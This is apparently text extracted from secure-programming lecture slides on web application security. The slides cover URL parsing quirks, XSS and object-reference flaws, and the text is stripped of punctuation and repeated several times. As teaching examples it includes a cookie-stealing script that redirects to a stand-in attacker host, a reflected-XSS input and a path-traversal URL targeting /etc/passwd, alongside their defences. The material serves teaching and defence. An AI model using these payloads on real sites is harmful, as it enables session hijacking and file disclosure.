Consequence of under-specificationDespite motivations behind XHTML to stop bad HTML onthe web browser implementations are still (deliberately)lax to try to be friendly to buggy web pages andbug-producing developers and backward compatibility(Q Why)

For URLs which donrsquot clearly conform to the original RFCthis leads to possibly unexpected treatments that varybetween browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 8: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Hierarchical versus scheme-specific

Every hierarchical URL in the generic syntax must havethe fixed string

Eacute Otherwise URL is scheme specificEacute eg mailtobobedacuksubject=Hello

Idea hierarchical URLs can be parsed generically

Unfortunately

Eacute Original RFC 1738 didnrsquot rule out non-hierarchicalURLs that contain

Eacute nor forbid (in practice) parsing URLS without

Consequence of under-specificationDespite motivations behind XHTML to stop bad HTML onthe web browser implementations are still (deliberately)lax to try to be friendly to buggy web pages andbug-producing developers and backward compatibility(Q Why)

For URLs which donrsquot clearly conform to the original RFCthis leads to possibly unexpected treatments that varybetween browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 9: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Consequence of under-specificationDespite motivations behind XHTML to stop bad HTML onthe web browser implementations are still (deliberately)lax to try to be friendly to buggy web pages andbug-producing developers and backward compatibility(Q Why)

For URLs which donrsquot clearly conform to the original RFCthis leads to possibly unexpected treatments that varybetween browsers

httpexamplecom

javascriptexamplecom0alert(1)

mailtouserexamplecom

Examples from The Tangled Web

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

Eacute the app developer (implicitly) authorized usersEacute to read documentation files he had createdEacute project was open source no need for loginsEacute app contained no paths to files outside the projectEacute so no explicit authorization code was written

Eacute but PHP code didnrsquot check the filename returnedEacute showhtmlphp provided access to server objectsEacute input validation only checked for file existence

There should have been a re-authorization stepA well-written app should only allow access to its ownresources

Looking at anyonersquos bank account

ltform action=show-accountasp method=getgtAccount to displayltselect name=accountgt

ltoption value=12345678901gt12345678901ltoptiongtltoption value=12346543210gt12346543210ltoptiongt

ltselectgtltinput type=submit name=show value=Show Accountgt

ltformgt

Example from Innocent Code based on a Norwegian newspaperstory about a ldquo17-year geek able to view anyonersquos bank accountrdquo

Solutions for object referencingRe-validate

Eacute Check authorization againEacute Obvious solution but duplicates effort

Add a data indirection

Eacute Session-specific server side array of account nos

ltoption value=1gt12345678901ltoptiongtltoption value=2gt12346543210ltoptiongt

Eacute Similarly for file access

httpresearchsiteedacukshowhtmlphpfile=1Introduction

for many files a hash table or database could be used

Passing too much information

Old flaw passing unnecessary information to client andexpecting it back unmodified

ltform action=cgi-bincgimailexe method=postgtltinput type=hidden name=$File$

value=templatesfeedbacktxtgtltinput type=hidden name=$To$

value=feedbacksomesiteexamplegtltformgt

Protecting information in server data

Sometimes the server must pass information to theclient during the interaction but must protect it

Example editing a wiki page

ltformgtltinput type=hidden name=pagename value=NineteenSixtiesToysgtlttextarea cols=80 rows=25 name=wpTextgt

ltformgt

Solution add a MAC constructed with a server-sidesecret key

ltinput type=hidden name=pagemacvalue=bc9faaae1e35d52f3dea9651da12cd36627b8403gt

Or could encrypt the pagename

Other authorization mistakes

Assuming requests occur in proper order

Eacute For an admin task (eg password reset) assumingthat user must have issued a GET to retrieve a formbefore a POSTEacute only checking authorization on first step

Authorization by obscurity

Eacute Supposing that because a web page is not linked tothe main site only people who are given it will beable to reach it

httpwwwmyservercomsecretareaprivatepaperpdf

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Review questionsURLs

Eacute Recap the 8 components of a URL From a serverside point of view which of these is trustworthyFrom the web app viewpoint which of these is itmost important to validate in output to protect yourusers

XSS

Eacute Explain how session stealing works with XSS Howcould a reflected XSS attack steal a session

Object references

Eacute Why is it important to add defence-in-depth whenconfiguring web servers Give three examples ofways in which a web application may be restrictedby a (separate) server

References

Some commentary and examples were taken from thetexts

Eacute Innocent Code a security wake-up call for webprogrammers by Sverre H Huseby Wiley 2004

Eacute The Tangled Web a Guide to Securing Modern WebApplications by Michal Zalewski No Starch Press2012

as well as the named RFCs

  • Overview
  • Essential Basics URLs
  • Output Filtering and XSS
  • Object references
  • Summary
Page 10: Secure Programming Lecture 11: Web Application Security II · Fragment identifier ##lastsection É Interpretation depends on client, resource type É in practice: anchor names in

Credentials

loginpassword

Eacute optionalEacute if not supplied browser acts ldquoanonymouslyrdquoEacute Interpretation is protocol specificEacute Wide range of characters possible

Eacute some browsers reject certain punctuation chars

Exercise When and when not might this be anappropriate authentication mechanism

Server address

address

RFC is quite strict

Eacute case-insensitive DNS name (wwwedacuk)Eacute IPv4 12921523364Eacute IPv6 in brackets [20014860a005000068]

Implementations are more relaxed

Eacute range of characters beyond DNS specEacute mix of digit formats http0x7f1 =

http127001

Question Why is this relevant to secure web appprogramming

Server port

8080

A decimal number preceded by a colon

Usually omitted the default port number for protocolused

Eacute eg 80 for HTTP 443 for HTTPS 21 for FTPEacute sometimes servers on non-standard ports is useful

Question What threats might this enable

Hierarchical file path

pathtoresource

Eacute Unix-style starts with Must resolve and Eacute Relative paths allow for non-fully-qualified URLsEacute old style apps

Eacute direct connection with file systemEacute resource=HTML file served by server

Eacute modern appsEacute very indirect Eacute complicated URL rewriting dynamic contentEacute paths mapped to parts of programs or databaseEacute server may be embedded in app

Question What implications does this have forreviewing the security of web apps

Query string

search=purple+bananas

Optional intended to pass arbitrary parameters toresource Commonly used syntax

name1=value1ampname2=value2

is not part of URL syntax Syntax is related to mail HTMLforms So

Eacute server may not presumeenforce query string formatEacute web applications may legally use other forms after

Fragment identifier

lastsection

Eacute Interpretation depends on client resource typeEacute in practice anchor names in HTML elements

Eacute Not intended to be sent to serverEacute Recent use store client-side state while browsing

Eacute can be changed without page reloadEacute easily bookmarked sharedEacute eg map locations

Exercise Find some uses of fragments on web pagesand servers See what happens if they are sent to theserver

Metacharacters

Eacute Some punctuation characters are not allowedEacute eg [ ] $ amp ( ) =

Eacute These are URL encoded with percent-ASCII hexEacute eg 2F encodes 25 encodes

The RFC does not specify a fixed mapping and browserstry to interpret as many user inputs as possible

Eg examples like http65xample63om may workin some browsers but not others Some browsers willcanonicalize the authority part of the URL then even trya search (foocom wwwfoocom )

The RFCs are not always followed

Non-ASCII text encodings in URLs

Eacute Original standards did not allow for non-ASCII textEacute but clearly desirable for non-English textEacute RFC 3492 introduced Punycode to allow

behind-the-scenes DNS lookupEacute DNS lookup xn-[US-ASCII]-[Unicode]Eacute Browser display Unicode part

Extension of 38 characters to 100000 glyphs allowedmany homograph attacks

Eacute peacom has 5 identical looking Cyrillic charsEacute there are non-slash characters that look like Eacute some attacks not easily prevented by DNS registrars

We have (puny) browser search engine defences for thisMoral probably better to stick with ASCII

Overall consequences

Parsing URLs more complicated than might hope

Eacute better to use well-tested libraries than ad hoc code

But for output want to be very careful

Eacute especially if URLs made from user (attacker) inputEacute should canonicalize then filter reformatEacute filter especially on the scheme and authority

Overall consequencesEyeballs can easily be fooled when looking at URLs

This is bad for ordinary users as well as web appdevelopers

httpexamplecomampgibberish=1234167772161

httpexamplecomcoredumpcx

httpexamplecomcoredumpcx

Which server is visited by each of these URLs

Exercise Try (carefully) visiting these URLs or otherssimilar Try asking some non-CS friends whose serversURLs like lsquowwwbarclaysbankingcomlsquo go to

Examples from The Tangled Web

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Underlying problem for XSS

ALWAYS CHECK YOUROUTPUTS

XSS attacks in general

Eacute Attack typically on (another) user of the web appEacute Attacker tricks app into displaying malicious code

Eacute typically script code

Many possible aims

Eacute display random images popup windowsEacute change page contents eg alter bank account

numberEacute session hijacking steal session cookies

Session hijacking with XSS

Picture from Innocent Code

Example injected script

ltscriptgtdocumentlocationreplace(httpwwwbadguyexamplestealphp+ what= + documentcookie)

ltscriptgt

Eacute redirects victimrsquos browser to attackers site passingcookie

Eacute might also pass currently visited web pageEacute then attackers server can issue a redirect back

again

Reflected XSSReflected XSS occurs when injected malicious codeisnrsquot stored in server but is immediately displayed in thevisited page Suppose

httpmymanpagesorgmanpagephptitle=Man+GCCprogram=gcc

dynamically makes HTML embedding title directly

lth1gtMan GCClth1gt

An attacker could use this with a malicious input

title=ltscriptgtltscriptgtprogram=gcc

which eg steals a cookie

Exercise Explain how this attack works in practice

XSS SolutionsInput processing tricky need to understand data flowthrough app quoting encoding passed tofromfunctions databases etc Hence output filtering

Plain output HTML encoding

Eacute Stored data values need to be encoded to representin HTML (eg lt converted to amplt etc)

Marked up output complex filtering

Eacute Need to work through tags in input and rule out riskyones Scripts may appear in attributes Flaky

Marked up output DSL

Eacute A better approach use a dedicated syntax convertto restricted subset of HTML

Outline

Overview

Essential Basics URLs

Output Filtering and XSS

Object references

Summary

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=release2FUsermanhtmlIntroduction

A ldquocoolrdquo PHP script showhtmlphp

Eacute take a plain HTML fileEacute wrap it with navigation links site styleEacute convert the internal links to reference back to

wrapped version

Embarrassing PHP blunders

httpresearchsiteedacukshowhtmlphptitle=User+Manualampfile=2Fetc25passwd

Eacute remote users can visit any file on the systemEacute mistake motivates defence-in-depth

Eacute http server should not serve up any fileEacute use internal web server config (separate apps)Eacute and external OS config (eg nobody user chroot)

Authorization and object access

What was the problem here

